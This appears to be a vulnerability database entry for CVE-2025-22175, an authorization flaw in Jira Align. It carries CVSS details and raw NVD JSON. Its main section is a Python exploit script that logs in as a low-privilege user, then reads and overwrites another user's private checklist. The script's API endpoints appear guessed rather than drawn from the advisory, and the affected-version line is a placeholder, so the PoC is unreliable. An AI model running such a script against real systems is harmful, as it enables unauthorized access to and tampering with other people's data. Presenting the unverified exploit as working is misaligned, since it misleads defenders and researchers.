Security Vulnerability Report
中文
CVE-2025-22175 CVSS 5.4 MEDIUM

CVE-2025-22175

Published: 2025-10-22 17:15:58
Last Modified: 2025-10-27 16:15:39

Description

Jira Align is vulnerable to an authorization issue. A low-privilege user can access unexpected endpoints that disclose a small amount of sensitive information. For example, a low-level user was able to modify the steps of another user's private checklist.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:atlassian:jira_align:*:*:*:*:*:*:*:* - VULNERABLE
Jira Align < 特定修复版本(需查看官方公告确认)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # CVE-2025-22175 PoC - Jira Align Authorization Bypass # Description: Low-privilege user can access/modify other users' private checklists TARGET_URL = "https://jira-align-instance.atlassian.com" LOGIN_ENDPOINT = "/rest/auth/latest/session" CHECKLIST_ENDPOINT = "/rest/jira-align/latest/checklist/{checklist_id}/steps" def exploit_cve_2025_22175(username, password, target_checklist_id): """ Exploit for CVE-2025-22175 - Jira Align Authorization Bypass This PoC demonstrates how a low-privilege user can access and modify private checklists belonging to other users. Args: username: Low-privilege account username password: Low-privilege account password target_checklist_id: ID of target user's private checklist Returns: bool: True if exploitation successful, False otherwise """ session = requests.Session() # Step 1: Authenticate with low-privilege account login_data = { "username": username, "password": password } try: # Attempt to login login_response = session.post( f"{TARGET_URL}{LOGIN_ENDPOINT}", json=login_data, timeout=30 ) if login_response.status_code != 200: print(f"[-] Authentication failed: {login_response.status_code}") return False print("[+] Successfully authenticated with low-privilege account") # Step 2: Access other user's private checklist (Authorization Bypass) checklist_response = session.get( f"{TARGET_URL}{CHECKLIST_ENDPOINT.format(checklist_id=target_checklist_id)}", timeout=30 ) if checklist_response.status_code == 200: print(f"[+] Authorization bypass successful!") print(f"[+] Retrieved checklist data: {checklist_response.text}") # Step 3: Modify checklist steps (Integrity Impact) modify_data = { "steps": [ {"id": 1, "completed": True, "text": "Modified by attacker"} ] } modify_response = session.put( f"{TARGET_URL}{CHECKLIST_ENDPOINT.format(checklist_id=target_checklist_id)}", json=modify_data, timeout=30 ) if modify_response.status_code == 200: print("[+] Successfully modified other user's private checklist!") return True else: print(f"[-] Failed to access checklist: {checklist_response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Request error: {str(e)}") return False if __name__ == "__main__": print("CVE-2025-22175 PoC - Jira Align Authorization Bypass") print("=" * 60) # Configuration - Replace with actual values USERNAME = "[email protected]" PASSWORD = "user_password" TARGET_CHECKLIST_ID = 12345 # Enumerated or discovered checklist ID result = exploit_cve_2025_22175(USERNAME, PASSWORD, TARGET_CHECKLIST_ID) if result: print("\n[!] Vulnerability confirmed - Authorization bypass successful") else: print("\n[-] Exploitation failed or target not vulnerable")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-22175", "sourceIdentifier": "[email protected]", "published": "2025-10-22T17:15:57.940", "lastModified": "2025-10-27T16:15:38.860", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Jira Align is vulnerable to an authorization issue. A low-privilege user can access unexpected endpoints that disclose a small amount of sensitive information. For example, a low-level user was able to modify the steps of another user's private checklist."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-285"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:atlassian:jira_align:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.14.0", "versionEndExcluding": "11.16.1", "matchCriteriaId": "FE85D038-4C13-4104-B53E-F3022F5D8117"}]}]}], "references": [{"url": "https://jira.atlassian.com/browse/JIRAALIGN-8644", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}]}}